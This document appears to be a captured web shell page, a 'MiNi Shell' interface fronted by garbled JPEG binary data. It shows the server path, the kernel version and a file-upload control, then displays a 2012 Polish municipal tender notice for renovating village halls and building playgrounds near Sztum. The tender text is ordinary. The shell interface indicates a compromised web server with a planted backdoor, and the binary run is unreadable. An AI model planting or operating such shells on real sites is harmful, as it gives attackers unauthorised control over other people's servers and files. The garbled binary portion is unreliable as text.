JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/83114-N-2012.html

<p class="kh_header"><b>Sztum: Aktywizacja mieszkańców terenów wiejskich poprzez remonty świetlic wiejskich w miejscowościach Czernin, Sztumskie Pole i Koślinka oraz urządzenie miejsc rekreacji w miejscowościach Górki, Szpitalna Wieś, Cygusy i Ramzy Małe</b><br>
<b>Numer ogłoszenia: 83114 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Sztum , ul. Mickiewicza 39, 82-400 Sztum, woj. pomorskie, tel. 055 6406303, faks 055 6406300.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Aktywizacja mieszkańców terenów wiejskich poprzez remonty świetlic wiejskich w miejscowościach Czernin, Sztumskie Pole i Koślinka oraz urządzenie miejsc rekreacji w miejscowościach Górki, Szpitalna Wieś, Cygusy i Ramzy Małe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający  dopuszcza możliwości składania ofert częściowych ( liczba części 2 )
 Przedmiot zamówienia podzielono na następujące części: 

1. Część I. - Remont świetlic 

1.1. Remont świetlicy wiejskiej w Czerninie w tym między innymi:
a) budowa wewnętrznych instalacji wodociągowo-kanalizacyjnej i centralnego ogrzewania,
b) częściowe wyburzenie ścian wewnętrznych i budowę nowych,
c) termomodernizacja w zakresie docieplenia ścian obiektu i stropodachu,
d) wykonanie izolacji przeciwwilgociowej fundamentów,
e) zamurowanie części otworów drzwiowych i wykucie nowych,
f) remont posadzek i tynków,
g) montaż zewnętrznej platformy dla osób niepełnosprawnych od strony elewacji wschodniej,
h) wymiana stolarki okiennej i drzwiowej,
i) częściowe utwardzenie nieruchomości gruntowej - roboty terenowe,
j) uprzątnięcie terenu,
k) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

1.2. Remont świetlicy w Sztumskim Polu w tym między innymi :
a) wymiana stolarki okiennej,
b) naprawa pęknięcia ściany zewnętrznej,
c) wykonanie powłok malarskich,
d) wykonanie izolacji przewodów wodociągowych w pom. przyłącza,
e) roboty porządkowe.
f) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

1.3. Remont świetlicy w Koślince w tym między innymi :  
a) skucie i ponowne wykonanie fragmentu tynku cem.-wap. na ścianie wewnętrznej w pomieszczeniu kuchennym,
b) wymiana fragmentu podłogi drewnianej,
c) wykonanie powłok malarskich,
d) naprawa/wymiana drzwiczek pieca kaflowego oraz wymiana żaluzji regulowanej na wlocie przewodu wentylacyjnego,
e) roboty porządkowe.
f) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

2. Część II. - Wykonanie miejsc rekreacji 

2.1.Urządzenie miejsca rekreacji w Górkach w tym między innymi : 
a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt.1
b) huśtawka pojedyncza drewniana - szt.1
c) altanka drewniana wraz z ławo stołem - szt.1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra - szt.1
e) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

2.2.Urządzenie miejsca rekreacji w Szpitalnej Wsi w tym między innymi : 
a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt.1
b) huśtawka pojedyncza drewniana - szt.1 
c) altanka drewniana wraz z ławo stołem - szt.1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra -szt.1
k) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

2.3.Urządzenie miejsca rekreacji w Cygusach w tym między innymi:  
a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt.1
b) huśtawka pojedyncza drewniana, - szt.1
c) altanka drewniana wraz z ławo stołem, - szt.1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra. - szt.1
e) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

2.4.Urządzenie miejsca rekreacji w Ramzach Małych w tym między innymi :  
a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt. 1
b huśtawka pojedyncza drewniana - szt. 1
c) altanka drewniana wraz z ławo stołem - szt. 1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra - szt. 1 
e) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

3.Szczegółowy opis przedmiotu zamówienia określają dokumentacje projektowe - projekty budowlano wykonawcze i specyfikacje techniczne wykonania i odbioru robót budowlanych.

4.Zamawiający zastrzega, aby zastosowane do budowy materiały posiadały ważne aprobaty techniczne lub deklaracje zgodności, certyfikaty bezpieczeństwa i atesty higieniczne. 
5. Zamawiający dopuszcza przy realizacji zamówienia zastosowanie urządzeń i materiałów równoważnych, co, do jakości i surowców użytych do ich wykonania, w stosunku do materiałów i urządzeń określonych w dokumentacji projektowej.
6. Roboty wykonywane będą z materiałów dostarczonych przez Wykonawcę.
7. Wygląd tablic informacyjnych należy uzgodnić z Zamawiającym. Wykonawca jest zobowiązany do przedłożenia Zamawiającemu próbnego wydruku tablicy informacyjnej w skali 1:1 w celu zatwierdzenia kolorystyki.
8. Dobór wszystkich urządzeń które będą montowane wymaga uzgodnienia i akceptacji Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.25.00-6, 45.42.10.00-4, 45.41.00.00-4, 45.32.10.00-3, 45.26.12.10-9, 45.44.21.00-8, 45.26.13.20-3, 45.23.32.22-1, 45.42.11.60-3, 45.26.21.10-5, 45.26.21.20-5, 45.33.20.00-3, 45.33.10.00-6, 45.31.00.00-3, 45.11.27.20-8, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.

2. Ustala się wadium w wysokości: 
dla części nr 1  w wysokości 6.000,00 zł (słownie złotych: sześć tysięcy )
dla części nr 2  w wysokości 400,00 ( słownie czterysta złotych)

3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
   3.1) w pieniądzu, przelewem na rachunek bankowy Zamawiającego:
       Nr: 19 8309 0000 0000 0042 2000 0040 
       przed upływem terminu składania ofert - przy czym za termin wniesienia wadium w 
       formie  przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego     
    3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
         kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
    3.3) w gwarancjach bankowych, 
    3.4) w gwarancjach ubezpieczeniowych 
    3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 
         dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 
         109, poz. 1158, z p. zm.) 
4. Zamawiający nie dopuszcza stosowania  w dokumentach gwarancyjnych i poręczeniach , zapisów uzależniających ich realizację  od czynności lub oświadczeń osób trzecich albo Wykonawcy. Dokumenty nie spełniające powyższego warunku, nie będą uwzględniane jako wypełnienie obowiązku złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 
Dla części I - Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 2 roboty budowlane polegające na remoncie lub przebudowie budynku o wartości nie mniejszej niż 200.000,00 zł każda; 
 Dla części II - Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej jedną robotę budowlaną polegającą na wykonaniu placu zabaw na kwotę nie mniejszą niż 16.000,00 zł .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
Dla części I - Warunek zostanie uznany za spełniony wówczas, gdy Wykonawca wykaże, że dysponuje lub będzie dysponować następującymi osobami: 
a) przynajmniej jedną osobą, która pełnić będzie obowiązki kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
b) przynajmniej jedną osobą, która pełnić będzie obowiązki kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowo-kanalizacyjnych. 
Dla części II - 
Warunek zostanie uznany za spełniony wówczas, gdy Wykonawca wykaże, że dysponuje lub będzie dysponować następującymi osobami: 
a) przynajmniej jedną osobą, która pełnić będzie obowiązki kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
Uwaga: Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz. U z 2006r nr 156,poz.1118 ze zm) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2008r nr 63, poz. 394)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez
Wykonawcę oświadczenia którego wzór stanowi załącznik do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy zawarto w projekcie umowy, który stanowi załącznik nr 1 do niniejszej siwz.
2. Zgodnie z przepisami ustawy Prawo zamówień publicznych, Zamawiający dopuszcza możliwość zmiany umowy na warunkach i w przypadkach określonych w specyfikacji istotnych warunków zamówienia w postępowaniu o udzielenie zamówienia będącego przedmiotem  niniejszej umowy.
3. Strony dopuszczają  możliwość zmiany umowy o zamówienie publiczne w następującym zakresie  :  
3.1. Co do terminów  wykonania i odbioru robót , w następujących przypadkach:
a) z powodu działania siły wyższej uniemożliwiającej zachowanie terminu wykonania prac,
b) z powodu ujawnienia się wad projektowych powodujących wstrzymanie prac do czasu  ich   usunięcia, 
c) z powodu konieczności wykonania zamówień dodatkowych , których nie można było przewidzieć w chwili zawarcia umowy ,
d) z powodu zmian prawa o charakterze bezwzględnie obowiązującym powodujących  konieczność wydłużenia procesu budowlanego (dodatkowe czynności prawne i faktyczne nakazane prawem nie występujące w dacie zawarcia  umowy, chyba, że ww. zmiany prawa winny być znane stronom w sytuacji odłożonego ich wejścia w życie - vacatio legis,
e) z powodu zmniejszenia zakresu robót budowlanych objętych umową
3.2. Co do zakresu robót objętych umową w przypadku, gdy ich wykonanie w całości lub części stanie się zbędne Zamawiającemu z jakiegokolwiek powodu albo stan wypłacalności Zamawiającego spowoduje konieczność ich zaniechania, w tym ulega zmniejszeniu wynagrodzenie Wykonawcy.
3.3. Co do oznaczenia stron, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę.
3.4. Co do osób reprezentujących strony w procesie budowlanym ( kierownik budowy, kierownik robót, inspektor nadzoru, itp.).
3.5.   Co do wysokości wynagrodzenia:
a) w przypadku zastosowania zamiennych rozwiązań technologicznych tańszych lub droższych przez obniżenie lub podwyższenie wynagrodzenia 
b) z powodu zmniejszenia zakresu robót budowlanych objętych umową - w tym przypadku ulega zmniejszeniu wynagrodzenie Wykonawcy
4.  Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art.140 ust.3 i art. 144 Prawa zamówień publicznych oraz zasad ogólnych rządzących tą ustawą,
5. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sztum.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Sztumie
ul. Mickiewicza 39 82-400 Sztum.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 12:00, miejsce: Urząd Miasta i Gminy w Sztumie
ul. Mickiewicza 39 82-400 Sztum
Pokój : Informacja Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja pn.: Aktywizacja mieszkańców terenów wiejskich poprzez remonty świetlic wiejskich w miejscowościach Czernin, Sztumskie Pole i Koślinka oraz urządzenie miejsc rekreacji w miejscowościach Górki, Szpitalna Wieś, Cygusy i Ramzy Małe współfinansowana jest ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego PROW na lata 2007-2013 - umowa o dofinansowanie projektu nr 00067-6930-UM1130087/10 z dnia 05.04.2011r. ze zmianami..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont świetlic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Remont świetlicy wiejskiej w Czerninie w tym między innymi:
a) budowa wewnętrznych instalacji wodociągowo-kanalizacyjnej i centralnego ogrzewania,
b) częściowe wyburzenie ścian wewnętrznych i budowę nowych,
c) termomodernizacja w zakresie docieplenia ścian obiektu i stropodachu,
d) wykonanie izolacji przeciwwilgociowej fundamentów,
e) zamurowanie części otworów drzwiowych i wykucie nowych,
f) remont posadzek i tynków,
g) montaż zewnętrznej platformy dla osób niepełnosprawnych od strony elewacji wschodniej,
h) wymiana stolarki okiennej i drzwiowej,
i) częściowe utwardzenie nieruchomości gruntowej - roboty terenowe,
j) uprzątnięcie terenu,
k) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

1.2. Remont świetlicy w Sztumskim Polu w tym między innymi :
a) wymiana stolarki okiennej,
b) naprawa pęknięcia ściany zewnętrznej,
c) wykonanie powłok malarskich,
d) wykonanie izolacji przewodów wodociągowych w pom. przyłącza,
e) roboty porządkowe.
f) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

1.3. Remont świetlicy w Koślince w tym między innymi :  
a) skucie i ponowne wykonanie fragmentu tynku cem.-wap. na ścianie wewnętrznej w pomieszczeniu kuchennym,
b) wymiana fragmentu podłogi drewnianej,
c) wykonanie powłok malarskich,
d) naprawa/wymiana drzwiczek pieca kaflowego oraz wymiana żaluzji regulowanej na wlocie przewodu wentylacyjnego,
e) roboty porządkowe.
f) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.25.00-6, 45.42.10.00-4, 45.41.00.00-4, 45.32.10.00-3, 45.26.12.10-9, 45.44.21.00-8, 45.26.13.20-3, 45.23.32.22-1, 45.42.11.60-3, 45.26.21.10-5, 45.26.21.20-5, 45.33.20.00-3, 45.33.10.00-6, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie miejsc rekreacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1.Urządzenie miejsca rekreacji w Górkach w tym między innymi : 
a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt.1
b) huśtawka pojedyncza drewniana - szt.1
c) altanka drewniana wraz z ławo stołem - szt.1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra - szt.1
e) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

2.2.Urządzenie miejsca rekreacji w Szpitalnej Wsi w tym między innymi : 
